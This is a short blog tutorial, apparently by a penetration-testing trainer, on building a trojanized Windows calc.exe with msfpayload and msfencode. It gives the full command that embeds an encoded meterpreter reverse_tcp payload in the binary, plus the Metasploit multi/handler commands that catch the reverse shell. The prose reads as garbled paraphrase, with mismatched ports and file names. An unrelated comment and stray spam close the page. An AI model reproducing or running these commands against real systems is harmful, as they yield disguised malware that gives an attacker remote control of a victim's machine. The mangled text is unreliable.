Breaking News

Creating Trojan Horse (Encoded)By Using Msfpayload

Creating Trojan horse

The indirect accesses in the past areas run singularly out of sight and do not connect with the client logged into the System at the time. A Trojan horse gives the presence of functional program that the client may utilization. This guide was create from the calc.exe application from a Microsoft Windows XP, Service Pack 3 platform. For this activity to work accurately, the calc.exe application must be copied to an external thumb drive.

Not all binaries on the Windows platform are powerless to Trojanization. Case in point, if the calc.exe application from a Windows 7 Ultimate platform was used, this attack would not by any means execute. Other contemplations are the measure of encoding used, dynamic firewalls, IDS (Intrusion Detection System), and cryptosystems. Not all executable will work; Trojanization of an executable is an experimentation, exploration methodology, best suited for a lab

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/calc.exe -o /root/Desktop/encodeTrojancalc.exe

Creating Trojan Horse (Encoded)By Using Msfpayload _o1

Figure shows the output from the making of the trojan-cmd-payload. exe Trojan horse from a Windows calc.exe binary. The Trojan horse made from the Windows binary calc.exe might be transferred to an exploited machine in various methods.

 

Set Up a Metasploit Listener:

The backdoor and Trojan horse that were made are client side attack and call home for further instruction. The Security analyzer will need to set up a lstener in Metasploit to answer the call. The multi-handler inside Metasploit is a celebrated voice-mail for a Trojan or backdoor to call home and get further instructions.

#msfconsole

>use exploit/multi/handler

>set PAYLOAD windows/meterpreter/reverse_tcp

>set LHOST {Attacker_IP}

>set LPORT 4444

>run

Creating Trojan Horse (Encoded)By Using Msfpayload _2

Given Figure shows the setup of a listener on Metasploit and a get back to from a backdoor. The connection was produced using the exploited victim’s Operating System with the unencoded-payload.exe application was executed.

About Vijay Kumar

Ethical Hacking & Penetration Testing Trainer, For more detail view My Profile

2 comments

  1. danishsherzad@gmail.com'

    HELLO SIR HOW ARE U ,,HOPING U R BEST DER AT HI-TECH MISSING U OL AUR KON KON AA RHA HAI AJ KAL
    KOI NEW STUDENTS AAE KYA WAHA PAR AUR AUR MAI APKE VIDEOS DEKHTA REHTA HU ..AUR BTAIE WAITNG FOR UR REPLY

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Watch Dragon ball super